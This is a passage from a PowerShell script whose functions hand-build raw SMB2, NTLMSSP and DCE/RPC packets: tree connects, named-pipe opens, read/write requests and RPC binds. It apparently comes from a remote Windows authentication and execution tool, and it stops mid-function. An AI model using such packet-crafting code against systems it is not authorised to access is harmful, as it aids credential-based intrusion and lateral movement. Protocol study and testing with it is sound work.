254 | 255 | #SMB2 256 | 257 | function Get-PacketSMB2Header() 258 | { 259 | param([Byte[]]$packet_command,[Int]$packet_message_ID,[Byte[]]$packet_tree_ID,[Byte[]]$packet_session_ID) 260 | 261 | [Byte[]]$packet_message_ID = [System.BitConverter]::GetBytes($packet_message_ID) + 0x00,0x00,0x00,0x00 262 | 263 | $packet_SMB2Header = New-Object System.Collections.Specialized.OrderedDictionary 264 | $packet_SMB2Header.Add("SMB2Header_ProtocolID",[Byte[]](0xfe,0x53,0x4d,0x42)) 265 | $packet_SMB2Header.Add("SMB2Header_StructureSize",[Byte[]](0x40,0x00)) 266 | $packet_SMB2Header.Add("SMB2Header_CreditCharge",[Byte[]](0x01,0x00)) 267 | $packet_SMB2Header.Add("SMB2Header_ChannelSequence",[Byte[]](0x00,0x00)) 268 | $packet_SMB2Header.Add("SMB2Header_Reserved",[Byte[]](0x00,0x00)) 269 | $packet_SMB2Header.Add("SMB2Header_Command",$packet_command) 270 | $packet_SMB2Header.Add("SMB2Header_CreditRequest",[Byte[]](0x00,0x00)) 271 | $packet_SMB2Header.Add("SMB2Header_Flags",[Byte[]](0x00,0x00,0x00,0x00)) 272 | $packet_SMB2Header.Add("SMB2Header_NextCommand",[Byte[]](0x00,0x00,0x00,0x00)) 273 | $packet_SMB2Header.Add("SMB2Header_MessageID",$packet_message_ID) 274 | $packet_SMB2Header.Add("SMB2Header_Reserved2",[Byte[]](0x00,0x00,0x00,0x00)) 275 | $packet_SMB2Header.Add("SMB2Header_TreeID",$packet_tree_ID) 276 | $packet_SMB2Header.Add("SMB2Header_SessionID",$packet_session_ID) 277 | $packet_SMB2Header.Add("SMB2Header_Signature",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 278 | 279 | return $packet_SMB2Header 280 | } 281 | 282 | function Get-PacketSMB2NegotiateProtocolRequest() 283 | { 284 | $packet_SMB2NegotiateProtocolRequest = New-Object System.Collections.Specialized.OrderedDictionary 285 | $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_StructureSize",[Byte[]](0x24,0x00)) 286 | $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_DialectCount",[Byte[]](0x02,0x00)) 287 | 
$packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_SecurityMode",[Byte[]](0x01,0x00)) 288 | $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved",[Byte[]](0x00,0x00)) 289 | $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Capabilities",[Byte[]](0x40,0x00,0x00,0x00)) 290 | $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_ClientGUID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 291 | $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextOffset",[Byte[]](0x00,0x00,0x00,0x00)) 292 | $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_NegotiateContextCount",[Byte[]](0x00,0x00)) 293 | $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Reserved2",[Byte[]](0x00,0x00)) 294 | $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect",[Byte[]](0x02,0x02)) 295 | $packet_SMB2NegotiateProtocolRequest.Add("SMB2NegotiateProtocolRequest_Dialect2",[Byte[]](0x10,0x02)) 296 | 297 | return $packet_SMB2NegotiateProtocolRequest 298 | } 299 | 300 | function Get-PacketSMB2SessionSetupRequest() 301 | { 302 | param([Byte[]]$packet_security_blob) 303 | 304 | [Byte[]]$packet_security_blob_length = [System.BitConverter]::GetBytes($packet_security_blob.Length) 305 | $packet_security_blob_length = $packet_security_blob_length[0,1] 306 | 307 | $packet_SMB2SessionSetupRequest = New-Object System.Collections.Specialized.OrderedDictionary 308 | $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_StructureSize",[Byte[]](0x19,0x00)) 309 | $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Flags",[Byte[]](0x00)) 310 | $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityMode",[Byte[]](0x01)) 311 | $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Capabilities",[Byte[]](0x00,0x00,0x00,0x00)) 312 | 
$packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00)) 313 | $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferOffset",[Byte[]](0x58,0x00)) 314 | $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_SecurityBufferLength",$packet_security_blob_length) 315 | $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_PreviousSessionID",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 316 | $packet_SMB2SessionSetupRequest.Add("SMB2SessionSetupRequest_Buffer",$packet_security_blob) 317 | 318 | return $packet_SMB2SessionSetupRequest 319 | } 320 | 321 | function Get-PacketSMB2TreeConnectRequest() 322 | { 323 | param([Byte[]]$packet_path) 324 | 325 | [Byte[]]$packet_path_length = [System.BitConverter]::GetBytes($packet_path.Length) 326 | $packet_path_length = $packet_path_length[0,1] 327 | 328 | $packet_SMB2TreeConnectRequest = New-Object System.Collections.Specialized.OrderedDictionary 329 | $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_StructureSize",[Byte[]](0x09,0x00)) 330 | $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Reserved",[Byte[]](0x00,0x00)) 331 | $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathOffset",[Byte[]](0x48,0x00)) 332 | $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_PathLength",$packet_path_length) 333 | $packet_SMB2TreeConnectRequest.Add("SMB2TreeConnectRequest_Buffer",$packet_path) 334 | 335 | return $packet_SMB2TreeConnectRequest 336 | } 337 | 338 | function Get-PacketSMB2CreateRequestFile() 339 | { 340 | param([Byte[]]$packet_named_pipe) 341 | 342 | $packet_named_pipe_length = [System.BitConverter]::GetBytes($packet_named_pipe.Length) 343 | $packet_named_pipe_length = $packet_named_pipe_length[0,1] 344 | 345 | $packet_SMB2CreateRequestFile = New-Object System.Collections.Specialized.OrderedDictionary 346 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_StructureSize",[Byte[]](0x39,0x00)) 347 | 
$packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Flags",[Byte[]](0x00)) 348 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_RequestedOplockLevel",[Byte[]](0x00)) 349 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Impersonation",[Byte[]](0x02,0x00,0x00,0x00)) 350 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_SMBCreateFlags",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 351 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Reserved",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 352 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_DesiredAccess",[Byte[]](0x03,0x00,0x00,0x00)) 353 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_FileAttributes",[Byte[]](0x80,0x00,0x00,0x00)) 354 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_ShareAccess",[Byte[]](0x01,0x00,0x00,0x00)) 355 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateDisposition",[Byte[]](0x01,0x00,0x00,0x00)) 356 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateOptions",[Byte[]](0x40,0x00,0x00,0x00)) 357 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameOffset",[Byte[]](0x78,0x00)) 358 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_NameLength",$packet_named_pipe_length) 359 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsOffset",[Byte[]](0x00,0x00,0x00,0x00)) 360 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_CreateContextsLength",[Byte[]](0x00,0x00,0x00,0x00)) 361 | $packet_SMB2CreateRequestFile.Add("SMB2CreateRequestFile_Buffer",$packet_named_pipe) 362 | 363 | return $packet_SMB2CreateRequestFile 364 | } 365 | 366 | function Get-PacketSMB2ReadRequest() 367 | { 368 | param ([Byte[]]$packet_file_ID) 369 | 370 | $packet_SMB2ReadRequest = New-Object System.Collections.Specialized.OrderedDictionary 371 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_StructureSize",[Byte[]](0x31,0x00)) 372 | 
$packet_SMB2ReadRequest.Add("SMB2ReadRequest_Padding",[Byte[]](0x50)) 373 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Flags",[Byte[]](0x00)) 374 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Length",[Byte[]](0x00,0x00,0x10,0x00)) 375 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 376 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_FileID",$packet_file_ID) 377 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_MinimumCount",[Byte[]](0x00,0x00,0x00,0x00)) 378 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00)) 379 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00)) 380 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoOffset",[Byte[]](0x00,0x00)) 381 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_ReadChannelInfoLength",[Byte[]](0x00,0x00)) 382 | $packet_SMB2ReadRequest.Add("SMB2ReadRequest_Buffer",[Byte[]](0x30)) 383 | 384 | return $packet_SMB2ReadRequest 385 | } 386 | 387 | function Get-PacketSMB2WriteRequest() 388 | { 389 | param([Byte[]]$packet_file_ID,[Int]$packet_RPC_length) 390 | 391 | [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_RPC_length) 392 | 393 | $packet_SMB2WriteRequest = New-Object System.Collections.Specialized.OrderedDictionary 394 | $packet_SMB2WriteRequest.Add("SMB2WriteRequest_StructureSize",[Byte[]](0x31,0x00)) 395 | $packet_SMB2WriteRequest.Add("SMB2WriteRequest_DataOffset",[Byte[]](0x70,0x00)) 396 | $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Length",$packet_write_length) 397 | $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Offset",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 398 | $packet_SMB2WriteRequest.Add("SMB2WriteRequest_FileID",$packet_file_ID) 399 | $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Channel",[Byte[]](0x00,0x00,0x00,0x00)) 400 | $packet_SMB2WriteRequest.Add("SMB2WriteRequest_RemainingBytes",[Byte[]](0x00,0x00,0x00,0x00)) 401 | 
$packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoOffset",[Byte[]](0x00,0x00)) 402 | $packet_SMB2WriteRequest.Add("SMB2WriteRequest_WriteChannelInfoLength",[Byte[]](0x00,0x00)) 403 | $packet_SMB2WriteRequest.Add("SMB2WriteRequest_Flags",[Byte[]](0x00,0x00,0x00,0x00)) 404 | 405 | return $packet_SMB2WriteRequest 406 | } 407 | 408 | function Get-PacketSMB2CloseRequest() 409 | { 410 | param ([Byte[]]$packet_file_ID) 411 | 412 | $packet_SMB2CloseRequest = New-Object System.Collections.Specialized.OrderedDictionary 413 | $packet_SMB2CloseRequest.Add("SMB2CloseRequest_StructureSize",[Byte[]](0x18,0x00)) 414 | $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Flags",[Byte[]](0x00,0x00)) 415 | $packet_SMB2CloseRequest.Add("SMB2CloseRequest_Reserved",[Byte[]](0x00,0x00,0x00,0x00)) 416 | $packet_SMB2CloseRequest.Add("SMB2CloseRequest_FileID",$packet_file_ID) 417 | 418 | return $packet_SMB2CloseRequest 419 | } 420 | 421 | function Get-PacketSMB2TreeDisconnectRequest() 422 | { 423 | $packet_SMB2TreeDisconnectRequest = New-Object System.Collections.Specialized.OrderedDictionary 424 | $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_StructureSize",[Byte[]](0x04,0x00)) 425 | $packet_SMB2TreeDisconnectRequest.Add("SMB2TreeDisconnectRequest_Reserved",[Byte[]](0x00,0x00)) 426 | 427 | return $packet_SMB2TreeDisconnectRequest 428 | } 429 | 430 | function Get-PacketSMB2SessionLogoffRequest() 431 | { 432 | $packet_SMB2SessionLogoffRequest = New-Object System.Collections.Specialized.OrderedDictionary 433 | $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_StructureSize",[Byte[]](0x04,0x00)) 434 | $packet_SMB2SessionLogoffRequest.Add("SMB2SessionLogoffRequest_Reserved",[Byte[]](0x00,0x00)) 435 | 436 | return $packet_SMB2SessionLogoffRequest 437 | } 438 | 439 | #NTLM 440 | 441 | function Get-PacketNTLMSSPNegotiate() 442 | { 443 | param([Byte[]]$packet_negotiate_flags,[Byte[]]$packet_version) 444 | 445 | [Byte[]]$packet_NTLMSSP_length = 
[System.BitConverter]::GetBytes(32 + $packet_version.Length) 446 | $packet_NTLMSSP_length = $packet_NTLMSSP_length[0] 447 | [Byte[]]$packet_ASN_length_1 = $packet_NTLMSSP_length[0] + 32 448 | [Byte[]]$packet_ASN_length_2 = $packet_NTLMSSP_length[0] + 22 449 | [Byte[]]$packet_ASN_length_3 = $packet_NTLMSSP_length[0] + 20 450 | [Byte[]]$packet_ASN_length_4 = $packet_NTLMSSP_length[0] + 2 451 | 452 | $packet_NTLMSSPNegotiate = New-Object System.Collections.Specialized.OrderedDictionary 453 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialContextTokenID",[Byte[]](0x60)) # the ASN.1 key names are likely not all correct 454 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InitialcontextTokenLength",$packet_ASN_length_1) 455 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechID",[Byte[]](0x06)) 456 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_ThisMechLength",[Byte[]](0x06)) 457 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_OID",[Byte[]](0x2b,0x06,0x01,0x05,0x05,0x02)) 458 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID",[Byte[]](0xa0)) 459 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength",$packet_ASN_length_2) 460 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenID2",[Byte[]](0x30)) 461 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_InnerContextTokenLength2",$packet_ASN_length_3) 462 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID",[Byte[]](0xa0)) 463 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength",[Byte[]](0x0e)) 464 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID2",[Byte[]](0x30)) 465 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength2",[Byte[]](0x0c)) 466 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesID3",[Byte[]](0x06)) 467 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTypesLength3",[Byte[]](0x0a)) 468 | 
$packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechType",[Byte[]](0x2b,0x06,0x01,0x04,0x01,0x82,0x37,0x02,0x02,0x0a)) 469 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenID",[Byte[]](0xa2)) 470 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MechTokenLength",$packet_ASN_length_4) 471 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPID",[Byte[]](0x04)) 472 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NTLMSSPLength",$packet_NTLMSSP_length) 473 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) 474 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) 475 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_NegotiateFlags",$packet_negotiate_flags) 476 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 477 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 478 | 479 | if($packet_version) 480 | { 481 | $packet_NTLMSSPNegotiate.Add("NTLMSSPNegotiate_Version",$packet_version) 482 | } 483 | 484 | return $packet_NTLMSSPNegotiate 485 | } 486 | 487 | function Get-PacketNTLMSSPAuth() 488 | { 489 | param([Byte[]]$packet_NTLM_response) 490 | 491 | [Byte[]]$packet_NTLMSSP_length = [System.BitConverter]::GetBytes($packet_NTLM_response.Length) 492 | $packet_NTLMSSP_length = $packet_NTLMSSP_length[1,0] 493 | [Byte[]]$packet_ASN_length_1 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 12) 494 | $packet_ASN_length_1 = $packet_ASN_length_1[1,0] 495 | [Byte[]]$packet_ASN_length_2 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 8) 496 | $packet_ASN_length_2 = $packet_ASN_length_2[1,0] 497 | [Byte[]]$packet_ASN_length_3 = [System.BitConverter]::GetBytes($packet_NTLM_response.Length + 4) 498 | $packet_ASN_length_3 = $packet_ASN_length_3[1,0] 499 | 500 | $packet_NTLMSSPAuth = New-Object 
System.Collections.Specialized.OrderedDictionary 501 | $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID",[Byte[]](0xa1,0x82)) 502 | $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength",$packet_ASN_length_1) 503 | $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID2",[Byte[]](0x30,0x82)) 504 | $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength2",$packet_ASN_length_2) 505 | $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNID3",[Byte[]](0xa2,0x82)) 506 | $packet_NTLMSSPAuth.Add("NTLMSSPAuth_ASNLength3",$packet_ASN_length_3) 507 | $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPID",[Byte[]](0x04,0x82)) 508 | $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMSSPLength",$packet_NTLMSSP_length) 509 | $packet_NTLMSSPAuth.Add("NTLMSSPAuth_NTLMResponse",$packet_NTLM_response) 510 | 511 | return $packet_NTLMSSPAuth 512 | } 513 | 514 | #RPC 515 | 516 | function Get-PacketRPCBind() 517 | { 518 | param([Int]$packet_call_ID,[Byte[]]$packet_max_frag,[Byte[]]$packet_num_ctx_items,[Byte[]]$packet_context_ID,[Byte[]]$packet_UUID,[Byte[]]$packet_UUID_version) 519 | 520 | [Byte[]]$packet_call_ID_bytes = [System.BitConverter]::GetBytes($packet_call_ID) 521 | 522 | $packet_RPCBind = New-Object System.Collections.Specialized.OrderedDictionary 523 | $packet_RPCBind.Add("RPCBind_Version",[Byte[]](0x05)) 524 | $packet_RPCBind.Add("RPCBind_VersionMinor",[Byte[]](0x00)) 525 | $packet_RPCBind.Add("RPCBind_PacketType",[Byte[]](0x0b)) 526 | $packet_RPCBind.Add("RPCBind_PacketFlags",[Byte[]](0x03)) 527 | $packet_RPCBind.Add("RPCBind_DataRepresentation",[Byte[]](0x10,0x00,0x00,0x00)) 528 | $packet_RPCBind.Add("RPCBind_FragLength",[Byte[]](0x48,0x00)) 529 | $packet_RPCBind.Add("RPCBind_AuthLength",[Byte[]](0x00,0x00)) 530 | $packet_RPCBind.Add("RPCBind_CallID",$packet_call_ID_bytes) 531 | $packet_RPCBind.Add("RPCBind_MaxXmitFrag",[Byte[]](0xb8,0x10)) 532 | $packet_RPCBind.Add("RPCBind_MaxRecvFrag",[Byte[]](0xb8,0x10)) 533 | $packet_RPCBind.Add("RPCBind_AssocGroup",[Byte[]](0x00,0x00,0x00,0x00)) 534 | 
$packet_RPCBind.Add("RPCBind_NumCtxItems",$packet_num_ctx_items) 535 | $packet_RPCBind.Add("RPCBind_Unknown",[Byte[]](0x00,0x00,0x00)) 536 | $packet_RPCBind.Add("RPCBind_ContextID",$packet_context_ID) 537 | $packet_RPCBind.Add("RPCBind_NumTransItems",[Byte[]](0x01)) 538 | $packet_RPCBind.Add("RPCBind_Unknown2",[Byte[]](0x00)) 539 | $packet_RPCBind.Add("RPCBind_Interface",$packet_UUID) 540 | $packet_RPCBind.Add("RPCBind_InterfaceVer",$packet_UUID_version) 541 | $packet_RPCBind.Add("RPCBind_InterfaceVerMinor",[Byte[]](0x00,0x00)) 542 | $packet_RPCBind.Add("RPCBind_TransferSyntax",[Byte[]](0x04,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x08,0x00,0x2b,0x10,0x48,0x60)) 543 | $packet_RPCBind.Add("RPCBind_TransferSyntaxVer",[Byte[]](0x02,0x00,0x00,0x00)) 544 | 545 | if($packet_num_ctx_items[0] -eq 2) 546 | { 547 | $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00)) 548 | $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01)) 549 | $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00)) 550 | $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0xc4,0xfe,0xfc,0x99,0x60,0x52,0x1b,0x10,0xbb,0xcb,0x00,0xaa,0x00,0x21,0x34,0x7a)) 551 | $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00)) 552 | $packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00)) 553 | $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 554 | $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) 555 | } 556 | elseif($packet_num_ctx_items[0] -eq 3) 557 | { 558 | $packet_RPCBind.Add("RPCBind_ContextID2",[Byte[]](0x01,0x00)) 559 | $packet_RPCBind.Add("RPCBind_NumTransItems2",[Byte[]](0x01)) 560 | $packet_RPCBind.Add("RPCBind_Unknown3",[Byte[]](0x00)) 561 | $packet_RPCBind.Add("RPCBind_Interface2",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 562 | $packet_RPCBind.Add("RPCBind_InterfaceVer2",[Byte[]](0x00,0x00)) 563 | 
$packet_RPCBind.Add("RPCBind_InterfaceVerMinor2",[Byte[]](0x00,0x00)) 564 | $packet_RPCBind.Add("RPCBind_TransferSyntax2",[Byte[]](0x33,0x05,0x71,0x71,0xba,0xbe,0x37,0x49,0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36)) 565 | $packet_RPCBind.Add("RPCBind_TransferSyntaxVer2",[Byte[]](0x01,0x00,0x00,0x00)) 566 | $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x02,0x00)) 567 | $packet_RPCBind.Add("RPCBind_NumTransItems3",[Byte[]](0x01)) 568 | $packet_RPCBind.Add("RPCBind_Unknown4",[Byte[]](0x00)) 569 | $packet_RPCBind.Add("RPCBind_Interface3",[Byte[]](0x43,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xc0,0x00,0x00,0x00,0x00,0x00,0x00,0x46)) 570 | $packet_RPCBind.Add("RPCBind_InterfaceVer3",[Byte[]](0x00,0x00)) 571 | $packet_RPCBind.Add("RPCBind_InterfaceVerMinor3",[Byte[]](0x00,0x00)) 572 | $packet_RPCBind.Add("RPCBind_TransferSyntax3",[Byte[]](0x2c,0x1c,0xb7,0x6c,0x12,0x98,0x40,0x45,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 573 | $packet_RPCBind.Add("RPCBind_TransferSyntaxVer3",[Byte[]](0x01,0x00,0x00,0x00)) 574 | $packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a)) 575 | $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x04)) 576 | $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00)) 577 | $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00)) 578 | $packet_RPCBind.Add("RPCBind_ContextID4",[Byte[]](0x00,0x00,0x00,0x00)) 579 | $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) 580 | $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) 581 | $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) 582 | $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 583 | $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 584 | $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) 585 | } 586 | 587 | if($packet_call_ID -eq 3) 588 | { 589 | 
$packet_RPCBind.Add("RPCBind_AuthType",[Byte[]](0x0a)) 590 | $packet_RPCBind.Add("RPCBind_AuthLevel",[Byte[]](0x02)) 591 | $packet_RPCBind.Add("RPCBind_AuthPadLength",[Byte[]](0x00)) 592 | $packet_RPCBind.Add("RPCBind_AuthReserved",[Byte[]](0x00)) 593 | $packet_RPCBind.Add("RPCBind_ContextID3",[Byte[]](0x00,0x00,0x00,0x00)) 594 | $packet_RPCBind.Add("RPCBind_Identifier",[Byte[]](0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00)) 595 | $packet_RPCBind.Add("RPCBind_MessageType",[Byte[]](0x01,0x00,0x00,0x00)) 596 | $packet_RPCBind.Add("RPCBind_NegotiateFlags",[Byte[]](0x97,0x82,0x08,0xe2)) 597 | $packet_RPCBind.Add("RPCBind_CallingWorkstationDomain",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 598 | $packet_RPCBind.Add("RPCBind_CallingWorkstationName",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00)) 599 | $packet_RPCBind.Add("RPCBind_OSVersion",[Byte[]](0x06,0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f)) 600 | } 601 | 602 | return $packet_RPCBind 603 | } 604 | 605 | function Get-PacketRPCRequest() 606 | { 607 | param([Byte[]]$packet_flags,[Int]$packet_service_length,[Int]$packet_auth_length,[Int]$packet_auth_padding,[Byte[]]$packet_call_ID,[Byte[]]$packet_context_ID,[Byte[]]$packet_opnum,[Byte[]]$packet_data) 608 | 609 | if($packet_auth_length -gt 0) 610 | { 611 | $packet_full_auth_length = $packet_auth_length + $packet_auth_padding + 8 612 | } 613 | 614 | [Byte[]]$packet_write_length = [System.BitConverter]::GetBytes($packet_service_length + 24 + $packet_full_auth_length + $packet_data.Length) 615 | [Byte[]]$packet_frag_length = $packet_write_length[0,1] 616 | [Byte[]]$packet_alloc_hint = [System.BitConverter]::GetBytes($packet_service_length + $packet_data.Length) 617 | [Byte[]]$packet_auth_length = [System.BitConverter]::GetBytes($packet_auth_length) 618 | $packet_auth_length = $packet_auth_length[0,1] 619 | 620 | $packet_RPCRequest = New-Object System.Collections.Specialized.OrderedDictionary 621 | $packet_RPCRequest.Add("RPCRequest_Version",[Byte[]](0x05)) 622 | 
